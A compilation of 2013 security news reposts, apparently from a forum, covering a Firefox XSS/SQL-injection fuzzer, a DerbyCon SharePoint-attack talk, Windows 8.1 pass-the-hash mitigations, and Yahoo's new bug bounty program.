ImmuniWeb® Self-Fuzzer From: ImmuniWeb® Self-Fuzzer <self-fuzzer () htbridge com> Date: Thu, 03 Oct 2013 00:47:47 +0400 ImmuniWeb® Self-Fuzzer is a simple Firefox browser extension designed to detect Cross-Site Scripting (XSS) and SQL Injection vulnerabilities in web applications. It demonstrates how rapidly and easily these two most common types of web vulnerabilities can be found even by a person who is not familiar with web security. ImmuniWeb® Self-Fuzzer is not a web application security scanner or crawler, but a real-time web fuzzer. Once being activated by user in his browser, it carefully follows user’s HTTP requests and fuzzes them in real time, carefully checking all HTTP parameters passed within the requests. Results of fuzzing are also displayed in real-time, notifying user immediately upon vulnerability detection. Addon page: https://addons.mozilla.org/en/firefox/addon/immuniweb-self-fuzzer/ White Paper & HowTo: https://www.htbridge.com/publications/immuniweb_self_fuzzer_firefox_extension.html Sursa: WebApp Sec: ImmuniWeb® Self-Fuzzer

Derbycon 2013 - Tmi: How To Attack Sharepoint Servers And Tools To Make It Easier - Kevin Johnson And James Jardine Description: Description: SharePoint has become one of the most common platforms in organizations today. Originally designed for simple content management, it has grown into a workflow, CMS and communication powerhouse that run on intranets and the Internet all over the Internet. While it is powerful, most organizations do not realize the risks it exposes within their organization. Kevin Johnson and James Jardine of Secure Ideas will be walking attendees through the systems available under the SharePoint name, as well as showing ways that penetration testers are able to assess and exploit them. They will also be releasing a series of tools and guidelines to help organizations assess their SharePoint systems. < Bio: “Kevin Johnson is the Chief Executive Officer of Secure Ideas. Kevin has a long history in the IT field including system administration, network architecture and application development. He has been involved in building incident response and forensic teams, architecting security solutions for large enterprises and penetration testing everything from government agencies to Fortune 100 companies. In addition, Kevin is an instructor and author for the SANS Institute and a faculty member at IANS. He is also a contributing blogger at TheMobilityHub. Kevin has performed a large number of trainings, briefings and presentations for both public events and internal trainings. Kevin teaches for the SANS Institute on a number of subjects. He is the author of three classes: SEC542: Web Application Penetration Testing and Ethical Hacking, SEC642: Advanced Web Application Penetration Testing and SEC571: Mobile Device Security. Kevin has also presented at a large number of conventions, meetings and industry events. Some examples of these are: DerbyCon, ShmooCon, DEFCON, Blackhat, ISACA, Infragard and ISSA. Kevin is also very involved in the open source community. He runs a number of open source projects. These include SamuraiWTF; a web pen-testing environment, Laudanum; a collection of injectable web payloads, Yokoso; an infrastructure fingerprinting project and a number of others. Kevin is also involved in MobiSec and SH5ARK. Kevin was the founder and lead of the BASE project for Snort before transitioning that to another developer. James Jardine is a Principal Security Consultant with Secure Ideas, LLC. James has over 12 years of software development experience with over half of that focusing on application security. During his long development history, he has had the opportunity to write both large enterprise applications, thick clients, and mobile applications. He has held many roles including senior developer, software architect, and application security expert. In addition, James is an instructor and author for the SANS Institute. He is also a contributing blogger for the Secure Ideas blog, the Jardine Software blog, and the SANS Appsec blog. James has performed a number of trainings and presentations for both public events and internal trainings. James teaches the Dev544: Secure Coding in .Net course at the SANS Institute. He is also a contributing author for that course. James will also be teaching a mobile security course that he co-authored at BlackHat USA 2013. He has also presented on multiple webcasts, at the Kentucky ISSA InfoSec Summit, and BSides Orlando. In addition, James is the co-host of the Professionally Evil Perspective podcast and the Down the Security Rabbithole podcast. James is also involved in the open source community. he runs a number of open source projects. These include WCSA; a security analyzer for web.config files, and EventValMod; a tool to modify event validation values in .Net. He is also a contributor to the Laudanum project; a collection of injectable web payloads.” For More Information please visit : - Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Tmi: How To Attack Sharepoint Servers And Tools To Make It Easier - Kevin Johnson And James Jardine

Windows 8.1 stops pass-the-hash attacks Microsoft has armor-plated Windows 8.1 against the most feared attack on the planet. Here are the nitty-gritty details you need to know By Roger A. Grimes | InfoWorld Follow @rogeragrimes Pass-the-hash (PtH) attacks are among the most feared cyber attacks in the computer world. Many of my largest customers (Fortune 500, government, and so on) have told me it's their No. 1 worry above all other attack types. With PtH and other credential theft attacks, a hacker gains admin control over a computer, steals authentication credentials from disk or memory, and uses those credentials to initiate new connections and logons. Most operating systems are vulnerable to PtH attacks, although Microsoft Windows has certainly been the primary target thanks to its pervasiveness in the corporate environment and the availability of PtH tools. [ InfoWorld presents the Bossies 2013, the best open source software for security, data centers, clouds, and more. | Keep up with key security issues with InfoWorld's Security Central newsletter. ] Attackers using PtH attacks completely compromise just about every network they hit. Pretty much every APT (advanced persistent threat) attack team uses them. Every penetration test team uses them. And the tools to accomplish PtH attacks have only gotten better. That's why the anti-PtH measures built into Windows 8.1 are such a big deal. Hands off the hash Before Windows 8.1, the only real mitigations against PtH attacks were: Don't let hackers get admin control of your box Don't log on with elevated accounts, especially on computers not directly under your control Restrict the ability of local accounts to be used over the network Restrict what computers can connect to (using firewalls, IPSec, and so on) Force a reboot after logging on with an elevated account Unfortunately, most of these recommendations were difficult for most enterprises to implement without a lot of new policies, procedures, and elbow grease. On the software side, it's very difficult for any OS, including Windows, to stop PtH attacks while maintaining the SSO (single-sign-on) functionality customers absolutely require. Asking users to re-enter their logons every time they want to connect to new application, service, or drive share is the quickest way to make your OS obsolete. To the pleasant surprise of a lot of people, Windows 8.1 includes comprehensive pass-the-hash mitigations. While it doesn't completely eliminate the threat, it comes pretty darn close. Here's a summary of the PtH mitigations available in Windows 8.1: Strengthened LSASS to prevent hash dumps Many processes that used to store credentials in memory no longer do so Better methods to restrict local accounts from going over the network Programs no longer leave credentials in memory after a user logs out Allow RDP (Remote Desktop Protocol) connections to be used without putting the user's credentials on the remotely controlled computer Addition of a new Protected Users group, whose members' credentials cannot be used in remote PtH attacks Several other OS changes that make PtH attacks far more difficult to achieve (see the Technet summary) For those who want to drill down and determine how these new anti-PtH measures have been implemented here's some more detail: Protecting LSASS LSASS.exe is the main process used by Windows to verify authentication -- the same process most hacking tools attack to grab authentication credentials out of memory and on the disk. Most hacking tools work by intercepting LSASS and injecting their code into the process. In Windows 8.1, this is no longer possible (or much more difficult, at the very least). LSASS can be made a protected process, which makes it a lot harder to be manipulated by rogue software. Plus, it no longer stores LM hashes or plaintext equivalents in memory (already, Windows doesn't store those types of credentials on disk by default). Because protection of LSASS may break some legitimate legacy software, this is not enabled by default on anything but Windows 8.1 RT. I recommend that all admins worried about PtH attacks enable this feature after thorough testing. New security identifiers There are two new built-in security identifiers, called "Local account" and "Local account and member of the Administrators group." You can place all your local sensitive accounts in these groups, then use them to apply permissions, privileges, and policies. For instance, previous PtH mitigations recommended giving local admin accounts a privilege called Deny Network Logons, which would prevent them from being used to access Active Directory network resources. This is still a great mitigation, but it previously required that each individual account be marked with the denial privilege and that admins keep up with individual adds, moves, and changes. Now you can apply the privilege to the new SIDs and be done with it. Fixing RDP One of my biggest pet peeves regarding RDP is that it ends up putting the admin's logon credentials on the remote box being accessed. I used to recommend that admins use just about any other remote admin method (such as MMC or PowerShell) instead of RDP. In Windows 8.1, with the new restrictadmin feature enabled, RDP it doesn't put stealable credentials on the remote computer being managed. This is a big win -- enterprises around the world, celebrate! Protected Users group Members of the new Protected Users group are significantly harder to exploit in PtH attacks. Members can use only Kerberos, and their credentials cannot be delegated. Yes, Kerberos tickets can be used in credential theft attacks, but attackers aren't nearly as familiar with Kerberos, and the lack of delegation makes PtH attacks far more difficult. Many of these features are configurable, and they're protected by UEFI and SecureBoot; you can also turn them on and off. The only caveat I can think of is that all of these new mitigations are currently available only in Windows 8.1 and in Windows Server 2012 R2. I have little doubt customers will want these mitigations back-ported to previous versions, but I have no idea what Microsoft's plans are -- or even if it is reasonably possible to accomplish without causing too many operational problems. This story, "Windows 8.1 stops pass-the-hash attacks," was originally published at InfoWorld.com. Keep up on the latest developments in network security and read more of Roger Grimes' Security Adviser blog at InfoWorld.com. For the latest business technology news, follow InfoWorld.com on Twitter. Sursa: Windows 8.1 stops pass-the-hash attacks | Security - InfoWorld

So I’m the guy who sent the t-shirt out as a thank you. By Ramses Martinez, Director, Yahoo Paranoids So, I am the guy who started sending t-shirts as a thanks to people when they sent us a potential vulnerability issue. What an interesting 36 hours it has been Here’s the story. When I first took over the team that works with the security community on issues and vulnerabilities, we didn’t have a formal process to recognize and reward people who sent issues to us. We were very fast to remedy issues but didn’t have anything formal for thanking people that sent them in. I started sending a t-shirt as a personal “thanks.” It wasn’t a policy, I just thought it would be nice to do something beyond an email. I even bought the shirts with my own money. It wasn’t about the money, just a personal gesture on my behalf. At some point, a few people mentioned they already had a t-shirt from me, so I started buying a gift certificate so they could get another gift of their choice. The other thing people wanted was a letter they could show their boss or client. I write these letters myself. Most companies offer just a thanks, maybe some schwag, for identifying a potential vulnerability. There are those that offer money. If you’re interested, Bugcrowd.com has a list of what many companies do for bug and vulnerability reports. Of course, when you work for a company that serves more than 800 million people every month, you take network and user security very seriously. We have a large, dedicated team that looks for security vulnerabilities, as well as taking input from the community. When someone reports an issue or vulnerability to us, we react in a few hours, often minutes. We monitor all external reports 24 hours a day, 7 days a week. We recently decided to improve the process of vulnerability reporting. My “send a t-shirt” idea needed an upgrade. This month the security team was putting the finishing touches on the revised program. And then yesterday morning “t-shirt-gate” hit. My inbox was full of angry email from people inside and out of Yahoo. How dare I send just a t-shirt to people as a thanks? So rather than wait any longer, we’ve decided to preview our new vulnerability reporting policy a bit early. Our updated vulnerability reporting policies address five areas: 1) Reporting - We’re improving the reporting process for bugs and vulnerabilities to allow us to react even quicker and more effectively. Our new site will make sending in issues to us easier, and it will be more clear about the process. 2) Issue Validation - Yahoo’s security team currently reviews all submissions from the community within minutes or at most a few hours. We do this 365 days a year, 24 hours a day. This will not change, but the new reporting process will improve our overall speed and quality. 3) Issue Remediation - Like #2, we already act swiftly to address vulnerabilities or issues affecting our network and customers. Again, this is a 24x7 process for Yahoo, and that will not change. It’s important to note that the vulnerability in question in recent press stories had already been resolved by Yahoo’s security team by the time these stories were written. But with a more clear process, we hope to be even faster here, as well. 4) Recognition - Submitted issues are validated by our team. Upon validation we will contact the reporting individual or organization directly. People will be contacted by Yahoo in no more than fourteen days after submission (but typically much faster). And because we know that formal recognition from Yahoo is often useful to an individual’s career or a firm’s reputation, we will issue a formal recognition of your help either in an email or written letter, as appropriate. For the best reported issues, we will directly call out from our site an individual’s contribution in a “hall of fame.” 5) Reward - Out with t-shirts that I buy. Yahoo will now reward individuals and firms that identify what we classify as new, unique and/or high risk issues between $150 - $15,000. The amount will be determined by a clear system based on a set of defined elements that capture the severity of the issue. We’re excited to get this new process going and believe it will improve Yahoo’s relationship and effectiveness with the security community. We are committed to further improvements going forward. We take your help on improving the security of our services seriously. The small print on the revised policy isn’t quite final. We will release the new policy by October 31, 2013. In the meantime, the benefits of the policy will be implemented retroactively back to July 1, 2013. If you submitted something to us and we responded with an acknowledgement (and probably a t-shirt) after July 1st, we will reconnect with you about this new program. This includes, of course, a check for the researchers at High-Tech Bridge who didn’t like my t-shirt. Sursa: So I’m the guy who sent the t-shirt out as a thank you. | Yahoo! Developer Network

Ce sistem de operare ai? E cu update-uri la zi?